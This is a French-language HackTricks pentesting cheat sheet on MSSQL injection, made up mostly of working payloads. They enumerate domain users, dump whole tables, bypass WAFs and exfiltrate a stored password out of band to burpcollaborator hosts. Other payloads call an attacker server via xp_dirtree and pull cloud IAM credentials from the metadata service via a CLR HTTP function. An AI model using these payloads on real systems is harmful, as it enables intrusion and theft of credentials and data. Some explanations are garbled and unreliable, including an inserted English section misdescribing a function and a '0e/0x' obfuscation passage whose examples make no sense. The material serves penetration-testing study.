## Injection MSSQL

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Travaillez-vous dans une **entreprise de cybersécurité** ? Voulez-vous voir votre **entreprise annoncée dans HackTricks** ? ou voulez-vous avoir accès à la **dernière version de PEASS ou télécharger HackTricks en PDF** ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR au [repo hacktricks](https://github.com/carlospolop/hacktricks) et au [repo hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.

</details>

## Énumération Active Directory

Il est possible de **énumérer les utilisateurs de domaine via une injection SQL à l'intérieur d'un serveur MSSQL** en utilisant les fonctions MSSQL suivantes :

* **`SELECT DEFAULT_DOMAIN()`**: Obtenir le nom de domaine actuel.&#x20;
* **`master.dbo.fn_varbintohexstr(SUSER_SID('DOMAIN\Administrator'))`**: Si vous connaissez le nom de domaine (_DOMAIN_ dans cet exemple), cette fonction renverra le **SID de l'utilisateur Administrator** au format hexadécimal. Cela ressemblera à `0x01050000000[...]0000f401`, notez comment les **4 derniers octets** sont le nombre **500** en format **big endian**, qui est l'**ID commun de l'utilisateur administrateur**.\
  Cette fonction vous permettra de **connaître l'ID du domaine** (tous les octets sauf les 4 derniers).
* **`SUSER_SNAME(0x01050000000[...]0000e803)`** : Cette fonction renverra le **nom d'utilisateur de l'ID indiqué** (le cas échéant), dans ce cas **0000e803** en big endian == **1000** (généralement c'est l'ID du premier utilisateur régulier créé). Ensuite, vous pouvez imaginer que vous pouvez forcer l'ID utilisateur de 1000 à 2000 et probablement obtenir tous les noms d'utilisateur des utilisateurs du domaine. Par exemple en utilisant une fonction comme celle-ci :
```python
def get_sid(n):
	domain = '0x0105000000000005150000001c00d1bcd181f1492bdfc236'
	user = struct.pack('<I', int(n))
	user = user.hex()
	return f"{domain}{user}" #if n=1000, get SID of the user with ID 1000
```
## **Vecteurs alternatifs basés sur les erreurs**

Les injections SQL basées sur les erreurs ressemblent généralement à des constructions telles que `+AND+1=@@version--` et des variantes basées sur l'opérateur «OR». Les requêtes contenant de telles expressions sont généralement bloquées par les WAF. Pour contourner cela, concaténez une chaîne en utilisant le caractère %2b avec le résultat d'appels de fonction spécifiques qui déclenchent une erreur de conversion de type de données sur les données recherchées.

Voici quelques exemples de telles fonctions :

* `SUSER_NAME()`
* `USER_NAME()`
* `PERMISSIONS()`
* `DB_NAME()`
* `FILE_NAME()`
* `TYPE_NAME()`
* `COL_NAME()`

Exemple d'utilisation de la fonction `USER_NAME()`:
```
https://vuln.app/getItem?id=1'%2buser_name(@@version)--
```
![](https://swarm.ptsecurity.com/wp-content/uploads/2020/11/6.png)

## SSRF

### `fn_xe_file_target_read_file`

### Description

`fn_xe_file_target_read_file` is a function in Microsoft SQL Server that reads the contents of a file from the file system. This function is used by the Extended Events feature to read the contents of an event file.

### Impact

An attacker can use this function to read arbitrary files from the file system of the server where the MSSQL instance is running. This can lead to sensitive information disclosure, such as credentials, configuration files, and other sensitive data.

### Exploitation

To exploit this vulnerability, an attacker needs to have the `VIEW SERVER STATE` permission. This permission is granted by default to members of the `sysadmin` and `serveradmin` roles.

The following query can be used to read the contents of a file:

```sql
SELECT fn_xe_file_target_read_file('C:\path\to\file')
```

### Mitigation

To mitigate this vulnerability, restrict the `VIEW SERVER STATE` permission to only trusted users. Additionally, limit the file system permissions of the MSSQL service account to only the necessary files and directories.
```
https://vuln.app/getItem?id= 1+and+exists(select+*+from+fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select+pass+from+users+where+id=1)%2b'.064edw6l0h153w39ricodvyzuq0ood.burpcollaborator.net\1.xem',null,null))
```
**Permissions :** Nécessite l'autorisation **`VIEW SERVER STATE`** sur le serveur.
```sql
# Check if you have it
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='VIEW SERVER STATE';
# Or doing
Use master;
EXEC sp_helprotect 'fn_xe_file_target_read_file';
```
### `fn_get_audit_file`

### `fn_get_audit_file` est une fonction intégrée de Microsoft SQL Server qui permet de récupérer des informations d'audit. Cette fonction peut être utilisée pour extraire des données sensibles telles que des noms d'utilisateur, des adresses IP et des requêtes SQL. Les attaquants peuvent exploiter cette fonction pour extraire des informations confidentielles de la base de données. Il est important de s'assurer que les autorisations d'accès à cette fonction sont correctement configurées pour éviter toute fuite de données.
```
https://vuln.app/getItem?id= 1%2b(select+1+where+exists(select+*+from+fn_get_audit_file('\\'%2b(select+pass+from+users+where+id=1)%2b'.x53bct5ize022t26qfblcsxwtnzhn6.burpcollaborator.net\',default,default)))
```
**Permissions:** Nécessite l'autorisation **`CONTROL SERVER`**.
```sql
# Check if you have it
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='CONTROL SERVER';
# Or doing
Use master;
EXEC sp_helprotect 'fn_get_audit_file';
```
### `fn_trace_gettable`

La fonction `fn_trace_gettable` est une fonctionnalité de Microsoft SQL Server qui permet de récupérer les données de traçage stockées dans un fichier de trace. Cette fonction peut être utilisée pour extraire des informations sensibles telles que des noms d'utilisateur, des mots de passe et d'autres données confidentielles stockées dans les fichiers de trace. Les attaquants peuvent exploiter cette vulnérabilité en injectant du code malveillant dans les fichiers de trace pour récupérer des informations sensibles. Il est donc important de sécuriser les fichiers de trace en limitant l'accès aux utilisateurs autorisés et en supprimant les fichiers de trace obsolètes.
```
https://vuln.app/ getItem?id=1+and+exists(select+*+from+fn_trace_gettable('\\'%2b(select+pass+from+users+where+id=1)%2b'.ng71njg8a4bsdjdw15mbni8m4da6yv.burpcollaborator.net\1.trc',default))
```
**Permissions:** Nécessite l'autorisation **`CONTROL SERVER`**.
```sql
# Check if you have it
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='CONTROL SERVER';
# Or doing
Use master;
EXEC sp_helprotect 'fn_trace_gettabe';
```
Les méthodes les plus courantes pour effectuer un appel réseau que vous rencontrerez en utilisant MSSQL sont l'utilisation de la procédure stockée `xp_dirtree`, qui est curieusement non documentée par Microsoft, ce qui a conduit à sa [documentation par d'autres personnes sur Internet](https://www.baronsoftware.com/Blog/sql-stored-procedures-get-folder-files/). Cette méthode a été utilisée dans [de multiples exemples](https://www.notsosecure.com/oob-exploitation-cheatsheet/) d'exfiltration de données hors bande et de publications sur l'exploitation hors bande de [SQL Injection](https://gracefulsecurity.com/sql-injection-out-of-band-exploitation/) sur Internet.

Essentiellement,
```sql
DECLARE @user varchar(100);
SELECT @user = (SELECT user);  
EXEC ('master..xp_dirtree "\\'+@user+'.attacker-server\aa"');
```
Tout comme `LOAD_FILE` de MySQL, vous pouvez utiliser `xp_dirtree` pour effectuer une demande réseau vers **uniquement le port TCP 445**. Vous ne pouvez pas contrôler le numéro de port, mais vous pouvez lire des informations à partir de partages réseau.

**PS:** Cela ne fonctionne pas sur `Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)` exécuté sur un `Windows Server 2016 Datacenter` dans la configuration par défaut.

Il existe **d'autres** procédures stockées comme [**`master..xp_fileexist`**](https://social.technet.microsoft.com/wiki/contents/articles/40107.xp-fileexist-and-its-alternate.aspx) ou **`xp_subdirs`** qui peuvent être utilisées pour des résultats similaires.

### `xp_cmdshell` <a href="#master-xp-cmdshell" id="master-xp-cmdshell"></a>

Évidemment, vous pouvez également utiliser **`xp_cmdshell`** pour **exécuter** quelque chose qui déclenche un **SSRF**. Pour plus d'informations, **lisez la section pertinente** de la page :

{% content-ref url="../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/" %}
[pentesting-mssql-microsoft-sql-server](../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/)
{% endcontent-ref %}

### Fonction utilisateur définie MSSQL - SQLHttp <a href="#mssql-user-defined-function-sqlhttp" id="mssql-user-defined-function-sqlhttp"></a>

Il est assez simple d'écrire une **UDF CLR** (Fonction utilisateur définie par Common Language Runtime - code écrit avec l'un des langages **.NET** et compilé en tant que **DLL**) et de **la charger dans MSSQL pour des fonctions personnalisées**. Cependant, cela **nécessite un accès `dbo`** et peut ne pas fonctionner à moins que la connexion de l'application Web à la base de données **soit en tant que `sa` ou un rôle d'administrateur**.

[Ce dépôt Github contient le projet Visual Studio et les instructions d'installation](https://github.com/infiniteloopltd/SQLHttp) pour charger le binaire dans MSSQL en tant qu'assembly CLR et ensuite invoquer des requêtes GET HTTP depuis MSSQL.

[Le code `http.cs` utilise la classe `WebClient` pour effectuer une requête GET et récupérer le contenu](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/) tel que spécifié.
```csharp
using System.Data.SqlTypes;
using System.Net;

public partial class UserDefinedFunctions
{
    [Microsoft.SqlServer.Server.SqlFunction]
    public static SqlString http(SqlString url)
    {
        var wc = new WebClient();
        var html = wc.DownloadString(url.Value);
        return new SqlString (html);
    }
}
```
Dans les instructions d'installation, exécutez ce qui suit avant la requête `CREATE ASSEMBLY` pour ajouter le hachage SHA512 de l'assembly à la liste des assemblies de confiance sur le serveur (vous pouvez voir la liste en utilisant `select * from sys.trusted_assemblies;`)
```sql
EXEC sp_add_trusted_assembly 0x35acf108139cdb825538daee61f8b6b07c29d03678a4f6b0a5dae41a2198cf64cefdb1346c38b537480eba426e5f892e8c8c13397d4066d4325bf587d09d0937,N'HttpDb, version=0.0.0.0, culture=neutral, publickeytoken=null, processorarchitecture=msil';
```
Une fois que l'assemblage est ajouté et que la fonction est créée, nous pouvons exécuter ce qui suit pour effectuer nos requêtes HTTP.
```sql
DECLARE @url varchar(max);
SET @url = 'http://169.254.169.254/latest/meta-data/iam/security-credentials/s3fullaccess/';
SELECT dbo.http(@url);
```
## **Exploitation rapide: Récupérer une table entière en une seule requête**

Il existe deux façons simples de récupérer l'intégralité du contenu d'une table en une seule requête - l'utilisation de la clause FOR XML ou FOR JSON. La clause FOR XML nécessite un mode spécifié tel que «raw», donc en termes de brièveté FOR JSON est plus performant.

La requête pour récupérer le schéma, les tables et les colonnes de la base de données actuelle:
```
https://vuln.app/getItem?id=-1'+union+select+null,concat_ws(0x3a,table_schema,table_name,column_name),null+from+information_schema.columns+for+json+auto-- 
```
Les vecteurs basés sur les erreurs nécessitent un alias ou un nom, car la sortie des expressions sans l'un ou l'autre ne peut pas être formatée en JSON.
```
https://vuln.app/getItem?id=1'+and+1=(select+concat_ws(0x3a,table_schema,table_name,column_name)a+from+information_schema.columns+for+json+auto)-- 
```
## **Récupération de la requête en cours**

La requête SQL en cours d'exécution peut être récupérée à partir de l'accès `sys.dm_exec_requests` et `sys.dm_exec_sql_text`:
```
https://vuln.app/getItem?id=-1%20union%20select%20null,(select+text+from+sys.dm_exec_requests+cross+apply+sys.dm_exec_sql_text(sql_handle)),null,null
```
**Permissions:** Si l'utilisateur dispose de l'autorisation VIEW SERVER STATE sur le serveur, il verra toutes les sessions en cours d'exécution sur l'instance de SQL Server ; sinon, il ne verra que la session en cours.
```sql
# Check if you have it
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='VIEW SERVER STATE';
```
## **Petits trucs pour contourner les WAF**

Caractères d'espacement non standard : %C2%85 ou %C2%A0 :
```
https://vuln.app/getItem?id=1%C2%85union%C2%85select%C2%A0null,@@version,null-- 
```
Notation scientifique (0e) et hexadécimale (0x) pour l'obfuscation de UNION :

Lorsque vous effectuez une injection SQL dans une requête qui utilise l'opérateur UNION, vous pouvez utiliser des notations scientifiques ou hexadécimales pour obfusquer le mot clé UNION et éviter ainsi la détection par les filtres de sécurité.

Par exemple, vous pouvez utiliser la notation scientifique 0e pour remplacer le mot clé UNION. Voici un exemple :

```
SELECT 'a' WHERE 1=0 UNION ALL SELECT 'b' WHERE 1=0
```

Peut être réécrit en utilisant la notation scientifique comme suit :

```
SELECT 'a' WHERE 1=0 UNION ALL SELECT 'b' WHERE 1=0;--0e0
```

De même, vous pouvez utiliser la notation hexadécimale 0x pour remplacer le mot clé UNION. Voici un exemple :

```
SELECT 'a' WHERE 1=0 UNION ALL SELECT 'b' WHERE 1=0
```

Peut être réécrit en utilisant la notation hexadécimale comme suit :

```
SELECT 'a' WHERE 1=0 UNION ALL SELECT 'b' WHERE 1=0;--0x0
```
```
https://vuln.app/getItem?id=0eunion+select+null,@@version,null--
 
https://vuln.app/getItem?id=0xunion+select+null,@@version,null-- 
```
Un point au lieu d'un espace entre FROM et le nom d'une colonne:
```
https://vuln.app/getItem?id=1+union+select+null,@@version,null+from.users-- 
```
\N séparateur entre SELECT et une colonne jetable:
```
https://vuln.app/getItem?id=0xunion+select\Nnull,@@version,null+from+users-- 
```
## Références

* [https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)
* [https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#MSSQL](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#MSSQL)

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Travaillez-vous dans une entreprise de **cybersécurité** ? Voulez-vous voir votre **entreprise annoncée dans HackTricks** ? ou voulez-vous avoir accès à la **dernière version de PEASS ou télécharger HackTricks en PDF** ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR au [repo hacktricks](https://github.com/carlospolop/hacktricks) et au [repo hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.

</details>